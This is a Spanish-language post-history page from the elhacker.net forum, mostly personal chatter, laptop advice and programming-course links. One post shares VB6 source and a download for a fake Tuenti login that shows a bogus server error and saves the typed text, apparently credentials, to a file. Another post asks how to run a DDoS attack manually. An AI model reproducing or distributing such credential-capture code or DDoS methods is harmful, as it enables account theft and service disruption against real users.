elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Foro Libre / Volver? en: 25 Junio 2012, 00:17 am
Muy buenas :)

saludos a todos , la verdad esque no me veía escribiendo aquí de nuevo jeje lo que son las cosas... El caso esque llevo en el foro desde los 13 años, no me recordareis mucho ya que era más de leer desde el anonimato y demás. El caso esque recuerdo entrar en este foro con lo dicho 13 añitos y aprender a saco, fue bestial, recuerdo aprender durante un verano a full con vosotros aprendí C++, Linux , bactrack...etc Fue un "no parar" desde la mañana hasta la noche y claro aprendí mucho. Al principio todo guay pero llegaron los estudios e intente llevar  a la vez los estudios con esto y tuve una fundida de plomos en la cabeza impresionante, las ganas de ser ingeniero informatico se fueron abajo, con ellas las ganas de estudiar (no ganas de aprobar sino de estudiar bachiller cientifico y bajada de notas considerable) Ahora tenía pensado pasar un verano tranquilito con los amigos y demás hasta que me pillaron marihuana en mi cuarto hace una semana, todos mis planes para abajo, castigado en casa todo el verano. El caso esque estar en verano en casa da para mucho y me he llegado a plantear volver a los pc´s. Lo malo esque pasó de estudiar ciencias, y encima me da dolor de cabeza volver a aprender y empezar de digamos 0,5 porque ya las cosas me sonarían pero bufff. Se que es una pregunta un poco tonta pero quien sabe alomejor alguien me saca de dudas.

Un salu2!
2  Seguridad Informática / Hacking / Duda con DDoS en: 16 Agosto 2011, 12:56 pm
Buenas, ayer hize un  ataque ddos ya que voy a interesarme en estos temas. (Evidentemente hize el ataque a mi propia web apache  ;D) Bueno pues lo hize con un programa que se llama rDos en el que solo hay que introducir la ip y meter un puerto y ya esta , ale a atacar. Y la verdad funciono, pero a mi eso no me vale de nada me gustaria saber como "petarla" digamos manualmente con la cmd, porque el rDos ese es un ms-dos pero el trabajo digamos ya viene echo a  mi me gustaria saber como hacerlo manualmente nose si me explico.

Salu2
3  Informática / Hardware / Ayudadme a elegir una laptop por favor :) en: 14 Agosto 2011, 20:23 pm
Buenas, voy a meterme de arbitro de baloncesto de niños pequeños y por unos cuantos partidos me van a pagar 1200 euros. Tengo a mano un buen ordenador hp solo hay un problema, que no es mio, es de mi hermano y yo solo lo uso y me gustaria tener un pc propio. Se que las torres suelen ser mejores y puedes cambiarle piezas pero debido a que viajo bastante me va a salir mas rentable un buen portatil. Mi presupuesto serian 1200 euros, que podria comprarme que fuera de lo mejor? os pido consejo porque ya que me gasta 1200 euros quiero comprarme algo que se que es bueno. El principal uso que le daré al pc será UDK y 3D Max 2011 , algun que otro juego y ya xd Para eso no necesitaria un pc de 1200 euros pero ya que me lo compro he pensado comprarme uno bueno que no se quede anticuado al mes de comprarmelo jeje recomendadme algun portatil pliss

PD:Macbook pro 13 pulgadas seria bueno? me refiiero al de 2,3 Ghz.

También me interesaria que aparte de correr programas mas o menos pesados como UDK, me gustaria que tuviera una tarjeta grafica que no necesariamente sea la mejor pero me permita jugar a juegos de alta calidad grafica
4  Media / Juegos y Consolas / Cómo crear un videojuego en 3D en: 11 Agosto 2011, 20:02 pm
Buenas,

recién cree un canal para subir videos destinados a la creacion de videojuegos , y tal vez mas adelante de otros temas relacionados con la informatica.De momento, solo son dos videos: uno de introduccion y otro que sería el 1º tutorial que es sobre la interfaz de UDK, tambien subire videos de modelaje 3d y mas videos de udk proximamente. De momento os dejo los videos que subi. Salu2.















5  Programación / Programación Visual Basic / Mi primer programa en VB6 en: 3 Agosto 2011, 18:31 pm
Buenas :)

el otro dia ya comente  un video sobre una persona que vendia un fake de tuenti y bueno si lo han visto lo recordaran.El tipo lo vendia a  nose si creo recordar eran unos 3 euros o algo asi.Yo he creado uno parecido, tengo que decir que el suyo estaba mas currado pero bueno el resultado es el mismo, los dos sirven por igual solo que el mio es gratis.He recibido a mi cuenta de youtube un mensaje de esta persona que vendia su programa intentado de alguna forma amenazarme xDD y yo solo lo que hize fue comentar en su video que intentaria crear uno igual y lo subiria gratis pero en fin la gente es asi jaja

Les dejo el programa que la verdad no tiene ninguna complicacion programarlo y apenas tiene lineas de codigo pero me ha echo ilusion porque es mi primer programa y eso :)

DESCARGA:http://www.megaupload.com/?d=FNHD7BT8
PASS: norteacomputer


Código
  1. Private Sub Command1_Click()
  2. MsgBox ("HTTP Error 500 Internal server error")
  3. Dim F As Byte
  4. F = FreeFile
  5. Open App.Path & "\" & "FILESAVE.txt" For Append As #F
  6. Print #F, Text1.Text
  7. Print #F, Text2.Text
  8. Close #F
  9. End Sub



6  Foros Generales / Dudas Generales / Es legal? en: 3 Agosto 2011, 01:20 am
Bueno pues hoy por la red me encontre con este video:



lo del fake de tuenti y eso me da igual ya que creo que cualquiera podria programar ese programa o uno similar si tiene conocimientos basicos pero vengo a referirme si lo que hace de vender ese producto es legal?

Chao :)
7  Programación / Programación Visual Basic / Curso VB6 en: 2 Agosto 2011, 18:46 pm
Buenas :)

pues no quiero enrollarme mucho y eso asi que aqui les dejo mi primer tutorial del curso basico de visual basic donde practicamente solo veremos la interfaz de usuario y un par de cosas más.

Para descargarlo: www.megaupload.com/?d=1X9Y0TM5
Para verlo: http://www.youtube.com/watch?v=PadypbsL1Jw

Y este es mi blog donde iré añadiendo los siguientes tomos de este curso además de todo tipo de tutoriales: http://www.norteacomputer.blogspot.com/

Salu2 :)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines